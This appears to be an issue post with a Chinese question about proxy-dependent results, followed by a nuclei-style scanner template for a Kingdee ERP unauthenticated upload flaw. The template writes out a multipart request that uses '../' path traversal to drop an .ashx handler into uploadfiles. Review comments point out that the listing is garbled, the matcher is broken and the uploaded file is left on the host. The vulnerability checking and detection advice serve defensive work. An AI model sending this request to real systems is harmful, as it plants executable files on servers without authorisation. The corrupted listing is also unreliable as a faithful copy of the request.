Description

挂上代理就可以扫出来，不挂代理就验证不出来，这是为什么呢？
# Scanner template (as pasted into the issue) that checks a Kingdee ERP endpoint
# for an unauthenticated file-upload flaw by sending one multipart POST.
# NOTE(review): the id below spells "kindee" while info.name spells "kingdee";
# the description only repeats the name and does not say which component or
# product versions are affected.
# NOTE(review): this paste has lost its indentation and the blank lines that
# separate headers from bodies; Content-Length is fused with the first boundary
# and "Accept: /" was presumably "*/*". The listing is therefore not a
# byte-accurate copy of the request, and the declared length of 371 cannot be
# checked against it.
id: kindee-scpsupreghandler-fileupload
info:
name: kingdee-erp-file_upload
author: vitasoy
severity: critical
description: Kingdee ERP has a kingdee-erp-file_upload vulnerability.
tags: kingdee
# The request posts three form parts (dbId_v, FID, FAtt) to
# /k3cloud/SRM/ScpSupRegHandler. The FAtt filename carries "../" sequences
# pointing at an "uploadfiles" directory and ends in ".ashx."; its content is an
# ASP.NET handler that only writes a fixed marker string.
# Detection/mitigation view: requests to this path whose multipart filename
# contains "../" or a handler extension, and unexpected .ashx files under
# uploadfiles, are the artefacts to look for; the server should reject
# client-supplied path components and executable extensions.
# NOTE(review): nothing in this template removes the uploaded file, so a
# positive run appears to leave it on the tested host - confirm and clean up.
# NOTE(review): the matcher only looks for the text "附件保存成功" ("attachment
# saved successfully") in the upload response. No status code is checked and no
# request fetches the uploaded file to confirm the marker string, so a match
# shows the server reported a save, not that the file is reachable or executed.
# The dsl list and "condition: or" below are garbled and repeat one expression.
http:
-
raw:
-
|
POST /k3cloud/SRM/ScpSupRegHandler HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: /
Connection: close
Content-Type: multipart/form-data; boundary=2ac719f8e29343df94aa4ab49e456061
Content-Length: 371--2ac719f8e29343df94aa4ab49e456061
Content-Disposition: form-data; name="dbId_v".
--2ac719f8e29343df94aa4ab49e456061
Content-Disposition: form-data; name="FID"2023
--2ac719f8e29343df94aa4ab49e456061
Content-Disposition: form-data; name="FAtt"; filename="../../../../uploadfiles/rxfqaxnb.ashx."Content-Type: text/plain<%@ WebHandler Language="C#" Class="TestHandler" %>
using System;
using System.Web;
public class TestHandler : IHttpHandler {
public void ProcessRequest (HttpContext context) {
context.Response.ContentType= "text/plain";
context.Response.Write("vvqamowufznghchdvwleoqkylnuezaiq");
}
public bool IsReusable {
get {return false; }
}
}
--2ac719f8e29343df94aa4ab49e456061--
matchers:
- type: dsl
dsl:- 'contains(body,"附件保存成功")'
condition: or
- 'contains(body,"附件保存成功")'
-